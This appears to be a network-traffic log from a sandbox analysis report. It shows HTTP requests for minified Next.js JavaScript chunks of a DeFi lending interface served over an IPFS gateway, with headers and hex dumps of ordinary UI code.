                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 53 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 68 65 61 64 65 72 43 6f 6e 74 65 6e 74 2c 6e 3d 28 30 2c 76 2e 5a 29 28 65 2c 77 29 3b 72 65 74 75 72 6e 28 30 2c 4f 2e 6a 73 78 29 28 67 2e 47 2c 50 28 50 28 7b 65 76 65 6e 74 3a 7b 65 76 65 6e 74 4e 61 6d 65 3a 6a 2e 76 68 2e 54 4f 4f 4c 5f 54 49 50 2c 65 76 65 6e 74 50 61 72 61 6d 73 3a 7b 74 6f 6f 6c 74 69 70 3a 22 53 6c 69 70 70 61 67 65 20 54 6f 6c 6c 65 72 61 6e 63 65 22 7d 7d 7d 2c 6e 29 2c 7b 7d 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 4f 2e 6a 73 78 73 29 28 4f 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 74 26 26 28 30 2c 4f 2e 6a 73 78 73 29 28 4f 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 74 2c 28 30 2c 4f 2e 6a 73 78 29 28 6d 2e 5a 2c 7b
                                                                                                                                                                                                                                                  Data Ascii: S=function(e){var t=e.headerContent,n=(0,v.Z)(e,w);return(0,O.jsx)(g.G,P(P({event:{eventName:j.vh.TOOL_TIP,eventParams:{tooltip:"Slippage Tollerance"}}},n),{},{children:(0,O.jsxs)(O.Fragment,{children:[t&&(0,O.jsxs)(O.Fragment,{children:[t,(0,O.jsx)(m.Z,{


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  16192.168.2.549728209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC739OUTGET /_next/static/chunks/8977.8cefff53c53bdda4.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:40 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 42515
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreiarzcb4rmpdfkajxxhxumabyb33mkabe7wdq6g5ui7my4toikuc6e"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/8977.8cefff53c53bdda4.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreiarzcb4rmpdfkajxxhxumabyb33mkabe7wdq6g5ui7my4toikuc6e
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028474
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 30 63 62 65 39 33 34 33 64 39 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e40cbe9343d9-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 39 37 37 5d 2c 7b 37 35 31 35 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 74 2e 64 28 72 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6b 7d 7d 29 3b 76 61 72 20 6e 3d 74 28 36 33 33 36 36 29 2c 61 3d 74 28 38 37 34 36 32 29 2c 6f 3d 74 28 36 37 32 39 34 29 2c 73 3d 74 28 38 36 30 31 30 29 2c 69 3d 74 28 39 34 37 38 30 29 2c 63 3d 74 28 34 31 37 39 36 29 2c 75 3d 74 28 33 37 37 34 33 29 2c 6c 3d 74 28 35 34 32 33 35 29 2c 64 3d 74 28 38 35 38 39 33 29 2c 70 3d 28 30 2c 6c 2e 5a 29 28 28 30 2c 64 2e 6a 73 78 29 28 22
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8977],{75158:function(e,r,t){t.d(r,{Z:function(){return k}});var n=t(63366),a=t(87462),o=t(67294),s=t(86010),i=t(94780),c=t(41796),u=t(37743),l=t(54235),d=t(85893),p=(0,l.Z)((0,d.jsx)("
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 6f 76 65 72 22 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 65 2e 76 61 72 73 3f 60 72 67 62 61 28 24 7b 22 64 65 66 61 75 6c 74 22 3d 3d 3d 72 2e 63 6f 6c 6f 72 3f 65 2e 76 61 72 73 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 61 63 74 69 76 65 43 68 61 6e 6e 65 6c 3a 65 2e 76 61 72 73 2e 70 61 6c 65 74 74 65 2e 70 72 69 6d 61 72 79 2e 6d 61 69 6e 43 68 61 6e 6e 65 6c 7d 20 2f 20 24 7b 65 2e 76 61 72 73 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 68 6f 76 65 72 4f 70 61 63 69 74 79 7d 29 60 3a 28 30 2c 63 2e 46 71 29 28 22 64 65 66 61 75 6c 74 22 3d 3d 3d 72 2e 63 6f 6c 6f 72 3f 65 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 61 63 74 69 76 65 3a 65 2e 70 61 6c 65 74 74 65 5b 72 2e 63 6f 6c 6f 72 5d 2e 6d 61 69 6e 2c 65 2e 70 61 6c 65
                                                                                                                                                                                                                                                  Data Ascii: over":{backgroundColor:e.vars?`rgba(${"default"===r.color?e.vars.palette.action.activeChannel:e.vars.palette.primary.mainChannel} / ${e.vars.palette.action.hoverOpacity})`:(0,c.Fq)("default"===r.color?e.palette.action.active:e.palette[r.color].main,e.pale
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 7d 7d 29 3b 76 61 72 20 6e 3d 74 28 35 39 34 39 39 29 2c 61 3d 74 28 38 31 37 31 39 29 2c 6f 3d 74 28 38 37 30 35 34 29 2c 73 3d 28 74 28 36 37 32 39 34 29 2c 74 28 38 35 38 39 33 29 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 72 29 7b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6e 3d 6e 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72
                                                                                                                                                                                                                                                  Data Ascii: unction(){return p}});var n=t(59499),a=t(81719),o=t(87054),s=(t(67294),t(85893));function i(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);r&&(n=n.filter((function(r){return Object.getOwnPropertyDescriptor
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 73 65 6c 65 63 74 65 64 3a 68 6f 76 65 72 22 3a 7b 62 6f 72 64 65 72 3a 22 31 70 78 20 73 6f 6c 69 64 20 22 2e 63 6f 6e 63 61 74 28 72 2e 70 61 6c 65 74 74 65 2e 6f 74 68 65 72 2e 73 74 61 6e 64 61 72 64 49 6e 70 75 74 4c 69 6e 65 29 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 23 46 46 46 46 46 46 22 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 22 7d 2c 22 26 2e 4d 75 69 2d 73 65 6c 65 63 74 65 64 2c 20 26 2e 4d 75 69 2d 64 69 73 61 62 6c 65 64 22 3a 7b 7a 49 6e 64 65 78 3a 31 30 30 2c 68 65 69 67 68 74 3a 22 31 30 30 25 22 2c 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 63 65 6e 74 65 72 22 2c 63 6f 6c 6f 72 3a 72 2e 70 61 6c 65 74 74 65 2e 62 61 63 6b 67
                                                                                                                                                                                                                                                  Data Ascii: selected:hover":{border:"1px solid ".concat(r.palette.other.standardInputLine),backgroundColor:"#FFFFFF",borderRadius:"4px !important"},"&.Mui-selected, &.Mui-disabled":{zIndex:100,height:"100%",display:"flex",justifyContent:"center",color:r.palette.backg
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 73 78 29 28 75 2c 63 28 7b 7d 2c 65 29 29 7d 7d 2c 39 36 30 34 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 74 2e 72 28 72 29 2c 74 2e 64 28 72 2c 7b 57 69 74 68 64 72 61 77 4d 6f 64 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 57 65 7d 7d 29 3b 76 61 72 20 6e 3d 74 28 35 39 34 39 39 29 2c 61 3d 74 28 34 39 35 30 31 29 2c 6f 3d 74 28 36 37 32 39 34 29 2c 73 3d 74 28 34 37 31 33 30 29 2c 69 3d 74 28 37 33 39 36 35 29 2c 63 3d 74 28 38 31 39 35 29 2c 75 3d 74 28 34 36 39 33 30 29 2c 6c 3d 74 28 36 39 31 32 35 29 2c 64 3d 74 28 36 33 32 30 36 29 2c 70 3d 74 28 33 31 39 35 39 29 2c 6d 3d 74 28 39 34 36 33 35 29 2c 68 3d 74 28 39 30 31 31 36 29 2c 66 3d 74 28 31 32 37 39 29 3b 76 61 72 20 76 3d 6f 2e 66 6f 72 77 61 72 64 52 65 66 28
                                                                                                                                                                                                                                                  Data Ascii: sx)(u,c({},e))}},96046:function(e,r,t){t.r(r),t.d(r,{WithdrawModal:function(){return We}});var n=t(59499),a=t(49501),o=t(67294),s=t(47130),i=t(73965),c=t(8195),u=t(46930),l=t(69125),d=t(63206),p=t(31959),m=t(94635),h=t(90116),f=t(1279);var v=o.forwardRef(
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 28 22 30 22 29 26 26 28 73 3d 63 2e 6d 75 6c 74 69 70 6c 69 65 64 42 79 28 65 2e 74 6f 74 61 6c 42 6f 72 72 6f 77 73 4d 61 72 6b 65 74 52 65 66 65 72 65 6e 63 65 43 75 72 72 65 6e 63 79 29 2e 64 69 76 28 69 29 29 2c 6f 3d 5a 2e 5a 2e 6d 69 6e 28 6f 2c 73 2e 64 69 76 69 64 65 64 42 79 28 74 2e 66 6f 72 6d 61 74 74 65 64 50 72 69 63 65 49 6e 4d 61 72 6b 65 74 52 65 66 65 72 65 6e 63 65 43 75 72 72 65 6e 63 79 29 29 7d 72 65 74 75 72 6e 20 6f 7d 2c 55 3d 74 28 35 30 30 32 39 29 2c 71 3d 74 28 31 37 36 37 34 29 2c 46 3d 74 28 38 37 37 39 34 29 2c 59 3d 74 2e 6e 28 46 29 2c 7a 3d 74 28 37 35 33 33 31 29 2c 47 3d 74 28 32 34 32 34 33 29 2c 56 3d 74 28 38 30 38 35 34 29 2c 51 3d 74 28 38 35 39 34 35 29 2c 4b 3d 74 28 35 36 33 37 31 29 2c 24 3d 74 28 38 39 32 39
                                                                                                                                                                                                                                                  Data Ascii: ("0")&&(s=c.multipliedBy(e.totalBorrowsMarketReferenceCurrency).div(i)),o=Z.Z.min(o,s.dividedBy(t.formattedPriceInMarketReferenceCurrency))}return o},U=t(50029),q=t(17674),F=t(87794),Y=t.n(F),z=t(75331),G=t(24243),V=t(80854),Q=t(85945),K=t(56371),$=t(8929
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 36 5d 2c 54 3d 66 5b 37 5d 2c 53 3d 66 5b 38 5d 2c 4f 3d 66 5b 39 5d 2c 6a 3d 28 30 2c 63 2e 76 52 29 28 29 2c 43 3d 6a 2e 61 70 70 72 6f 76 61 6c 54 78 53 74 61 74 65 2c 49 3d 6a 2e 6d 61 69 6e 54 78 53 74 61 74 65 2c 52 3d 6a 2e 6c 6f 61 64 69 6e 67 54 78 6e 73 2c 44 3d 6a 2e 73 65 74 4d 61 69 6e 54 78 53 74 61 74 65 2c 5f 3d 6a 2e 73 65 74 54 78 45 72 72 6f 72 2c 4d 3d 6a 2e 73 65 74 47 61 73 4c 69 6d 69 74 2c 48 3d 6a 2e 73 65 74 4c 6f 61 64 69 6e 67 54 78 6e 73 2c 4e 3d 6a 2e 73 65 74 41 70 70 72 6f 76 61 6c 54 78 53 74 61 74 65 2c 5a 3d 28 30 2c 45 2e 5a 29 28 29 2c 42 3d 5a 2e 73 65 6e 64 54 78 2c 46 3d 5a 2e 73 69 67 6e 54 78 44 61 74 61 2c 6e 65 3d 28 30 2c 51 2e 4e 4c 29 28 29 2c 6f 65 3d 28 30 2c 6f 2e 75 73 65 53 74 61 74 65 29 28 76 6f 69 64
                                                                                                                                                                                                                                                  Data Ascii: 6],T=f[7],S=f[8],O=f[9],j=(0,c.vR)(),C=j.approvalTxState,I=j.mainTxState,R=j.loadingTxns,D=j.setMainTxState,_=j.setTxError,M=j.setGasLimit,H=j.setLoadingTxns,N=j.setApprovalTxState,Z=(0,E.Z)(),B=Z.sendTx,F=Z.signTxData,ne=(0,Q.NL)(),oe=(0,o.useState)(void
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 74 72 69 6e 67 28 29 7d 29 2c 65 2e 6e 65 78 74 3d 32 36 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 30 3a 65 2e 70 72 65 76 3d 32 30 2c 65 2e 74 30 3d 65 2e 63 61 74 63 68 28 30 29 2c 63 3d 28 30 2c 4a 2e 57 47 29 28 65 2e 74 30 2c 4a 2e 61 44 2e 47 41 53 5f 45 53 54 49 4d 41 54 49 4f 4e 2c 21 31 29 2c 5f 28 63 29 2c 44 28 7b 74 78 48 61 73 68 3a 76 6f 69 64 20 30 2c 6c 6f 61 64 69 6e 67 3a 21 31 7d 29 2c 4f 28 50 2e 76 68 2e 54 52 41 4e 53 41 43 54 49 4f 4e 5f 45 52 52 4f 52 2c 7b 74 72 61 6e 73 61 63 74 69 6f 6e 74 79 70 65 3a 7a 2e 55 51 2e 77 69 74 68 64 72 61 77 41 6e 64 53 77 69 74 63 68 2c 61 73 73 65 74 3a 69 2e 75 6e 64 65 72 6c 79 69 6e 67 41 73 73 65 74 2c 61 73 73 65 74 4e 61 6d 65 3a 69 2e 6e 61 6d 65 2c 65 72 72 6f 72 3a 65 2e 74 30 7d 29 3b 63
                                                                                                                                                                                                                                                  Data Ascii: tring()}),e.next=26;break;case 20:e.prev=20,e.t0=e.catch(0),c=(0,J.WG)(e.t0,J.aD.GAS_ESTIMATION,!1),_(c),D({txHash:void 0,loading:!1}),O(P.vh.TRANSACTION_ERROR,{transactiontype:z.UQ.withdrawAndSwitch,asset:i.underlyingAsset,assetName:i.name,error:e.t0});c
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 2e 6e 65 78 74 3d 33 37 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 32 3a 65 2e 70 72 65 76 3d 33 32 2c 65 2e 74 30 3d 65 2e 63 61 74 63 68 28 32 29 2c 64 3d 28 30 2c 4a 2e 57 47 29 28 65 2e 74 30 2c 4a 2e 61 44 2e 47 41 53 5f 45 53 54 49 4d 41 54 49 4f 4e 2c 21 31 29 2c 5f 28 64 29 2c 43 2e 73 75 63 63 65 73 73 7c 7c 4e 28 7b 74 78 48 61 73 68 3a 76 6f 69 64 20 30 2c 6c 6f 61 64 69 6e 67 3a 21 31 7d 29 3b 63 61 73 65 20 33 37 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 65 2e 73 74 6f 70 28 29 7d 7d 29 2c 65 2c 6e 75 6c 6c 2c 5b 5b 32 2c 33 32 5d 5d 29 7d 29 29 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 28 29 2c 66 65 3d 28 30 2c 6f 2e 75
                                                                                                                                                                                                                                                  Data Ascii: .next=37;break;case 32:e.prev=32,e.t0=e.catch(2),d=(0,J.WG)(e.t0,J.aD.GAS_ESTIMATION,!1),_(d),C.success||N({txHash:void 0,loading:!1});case 37:case"end":return e.stop()}}),e,null,[[2,32]])})));return function(){return e.apply(this,arguments)}}(),fe=(0,o.u


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  17192.168.2.549730209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC739OUTGET /_next/static/chunks/8420.5efc2099f7e56f19.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:40 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 54806
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreifu52qghnckfzybtczmj4dbeqgm674vvkb63ifoowcjsmeuv6ckqq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/8420.5efc2099f7e56f19.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreifu52qghnckfzybtczmj4dbeqgm674vvkb63ifoowcjsmeuv6ckqq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028474
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 30 63 65 62 63 61 34 32 65 38 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e40cebca42e8-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 34 32 30 5d 2c 7b 38 37 30 35 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 79 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 36 33 33 36 36 29 2c 6f 3d 72 28 38 37 34 36 32 29 2c 61 3d 72 28 36 37 32 39 34 29 2c 69 3d 72 28 38 36 30 31 30 29 2c 73 3d 72 28 39 34 37 38 30 29 2c 6c 3d 72 28 34 31 37 39 36 29 2c 63 3d 72 28 38 33 31 38 37 29 2c 75 3d 72 28 33 36 36 32 32 29 2c 64 3d 72 28 37 38 38 38 34 29 2c 70 3d 72 28 38 31 37 31 39 29 2c 62 3d 72 28 33 34 38 36 37 29
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8420],{87054:function(e,t,r){r.d(t,{Z:function(){return y}});var n=r(63366),o=r(87462),a=r(67294),i=r(86010),s=r(94780),l=r(41796),c=r(83187),u=r(36622),d=r(78884),p=r(81719),b=r(34867)
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 3a 68 6f 76 65 72 22 3a 7b 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 3a 22 6e 6f 6e 65 22 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 65 2e 76 61 72 73 3f 60 72 67 62 61 28 24 7b 65 2e 76 61 72 73 2e 70 61 6c 65 74 74 65 2e 74 65 78 74 2e 70 72 69 6d 61 72 79 43 68 61 6e 6e 65 6c 7d 20 2f 20 24 7b 65 2e 76 61 72 73 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 68 6f 76 65 72 4f 70 61 63 69 74 79 7d 29 60 3a 28 30 2c 6c 2e 46 71 29 28 65 2e 70 61 6c 65 74 74 65 2e 74 65 78 74 2e 70 72 69 6d 61 72 79 2c 65 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 68 6f 76 65 72 4f 70 61 63 69 74 79 29 2c 22 40 6d 65 64 69 61 20 28 68 6f 76 65 72 3a 20 6e 6f 6e 65 29 22 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 74 72 61 6e 73 70 61 72 65 6e 74
                                                                                                                                                                                                                                                  Data Ascii: :hover":{textDecoration:"none",backgroundColor:e.vars?`rgba(${e.vars.palette.text.primaryChannel} / ${e.vars.palette.action.hoverOpacity})`:(0,l.Fq)(e.palette.text.primary,e.palette.action.hoverOpacity),"@media (hover: none)":{backgroundColor:"transparent
